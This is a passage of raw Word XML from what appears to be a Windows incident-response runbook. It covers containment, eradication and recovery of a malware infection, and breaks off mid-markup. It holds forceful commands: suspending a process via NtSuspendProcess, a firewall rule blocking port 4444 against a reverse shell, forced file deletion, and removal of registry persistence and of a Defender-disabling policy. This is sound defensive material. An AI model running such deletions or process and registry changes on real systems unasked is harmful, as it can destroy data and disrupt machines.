            <w:tcW w:w="6110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E594" w14:textId="77777777" w:rsidR="00E22026" w:rsidRPr="00E22026" w:rsidRDefault="00E22026" w:rsidP="00E22026">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>$sig = '[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DllImport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">("ntdll.dll")] public static extern int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NtSuspendProcess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IntPtr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> h);'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F411F1" w14:textId="77777777" w:rsidR="00E22026" w:rsidRPr="00E22026" w:rsidRDefault="00E22026" w:rsidP="00E22026">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>$type = Add-Type -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MemberDefinition</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> $sig -Name </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NtDll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E22026"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 w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PassThru</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3F613237" w14:textId="21BAC8BD" w:rsidR="00E22026" w:rsidRPr="00E22026" w:rsidRDefault="00E22026" w:rsidP="00E22026">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$proc = Get-Process -Id </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;PID&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41D50726" w14:textId="0ED03A1B" w:rsidR="003826D7" w:rsidRDefault="00E22026" w:rsidP="00E22026">
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>type::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NtSuspendProcess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>($</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>proc.Handle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E22026">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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2482" w14:textId="06C0DA70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PS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="005A9E"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406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51B0" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Requires </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ProcessEx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> module — see note below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="7DE309D7" w14:textId="77777777" w:rsidTr="00E22026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630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4ACA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CC6600"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6110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2AA9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New-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NetFirewallRule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-DisplayName "IR_Block_Port4444" -Direction Outbound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LocalPort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4444 -Protocol TCP -Action Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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51DD" w14:textId="29CD9016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PS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="005A9E"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406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552A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Blocks reverse shell even if network is re-enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09FD784B" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="7FE28C39" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="FFA500"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="FFA500"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="FFA500"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="FFA500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FC7A09" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Suspend</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-Process requires the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ProcessEx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> module.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Install it first:  Install-Module -Name </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ProcessEx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Force -Scope </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CurrentUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Then import it:    Import-Module </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ProcessEx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Alternative (no module):  Use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NtSuspendProcess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> via .NET P/Invoke — ask your IR lead for the snippet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="312A688F" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="61479480" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3D008B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42FA078C" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 5 — Phase 3: Eradication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D005849" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove the threat </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>completely  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Steps 8 – 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1218E43F" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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12"/>
        <w:gridCol w:w="5941"/>
        <w:gridCol w:w="1068"/>
        <w:gridCol w:w="2257"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="05F34494" w14:textId="77777777" w:rsidTr="00603072">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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600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EE05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w="59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600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2B4D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w="10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600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21FC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Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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600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8184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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="2001ABD7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87E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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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9FB7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taskkill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/F /PID &lt;pid1&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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EE32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25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CF47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Forcefully terminates malicious process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="4467EFD0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2E62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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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44FD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dir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/s /b "%USERPROFILE%\Downloads\SecurityUpdate.exe"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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5A2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25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6581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Search Downloads folder for payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="154A1E45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D268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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>9b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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C370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dir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/s /b "C:\Users\Public\Documents\*.exe"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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697E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25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DD65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Also check Public Documents folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="374D40F0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07D8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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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CDF3" w14:textId="75F375B3" w:rsidR="003826D7" w:rsidRDefault="00C01814">
            <w:r w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>FileHash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Path "$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>env:USERPROFILE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>\Downloads\SecurityUpdate.exe</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>" -Algorithm SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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AD02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25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F561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Save this hash — it is your IoC for the IR report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="5BC29845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0198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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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E5DB" w14:textId="608B8F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Get-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FileHash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-Path "</w:t>
            </w:r>
            <w:r w:rsidR="00B81C92" w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00B81C92" w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>env:USERPROFILE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B81C92" w:rsidRPr="00C01814">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>\Downloads\SecurityUpdate.exe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>" -Algorithm MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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E0E5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25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7F0B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MD5 as second IoC — document both</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="63431A51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6FA6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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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1251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del /F /Q "%USERPROFILE%\Downloads\SecurityUpdate.exe"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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6D31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25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BA63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Permanently deletes the payload file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="24736D06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71AA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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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513D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reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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59C3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25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8E6C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Check user-level persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="7A9201FB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43F6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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>12b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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2AD5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reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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E799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25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B797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Check system-level persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="20029FDC" w14:textId="77777777" w:rsidTr="00603072">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="612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EA20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6600AA"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594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B5DA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reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v &lt;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MaliciousKeyName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&gt; /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1068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3913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25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4F51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Replace &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MaliciousKeyName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&gt; with exact name found in Step 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FBB6EB3" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="3659547B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="005F5F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74929035" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 6 — Phase 4: Recovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B33086" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Restore the system to clean </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>state  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Steps 14 – 16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C0AB752" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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12"/>
        <w:gridCol w:w="4915"/>
        <w:gridCol w:w="1247"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="4195BE89" w14:textId="77777777"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7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86F3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7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010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7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40D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Where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7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1CAB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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="07A1D26F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75B2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07777"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>14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0B40" w14:textId="094FBD07" w:rsidR="007F1922" w:rsidRPr="007F1922" w:rsidRDefault="007F1922" w:rsidP="007F1922">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F1922">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F1922">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DisableAntiSpyware</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007F1922">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> /f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
                <w:rtl/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
                <w:rtl/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="007F1922">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
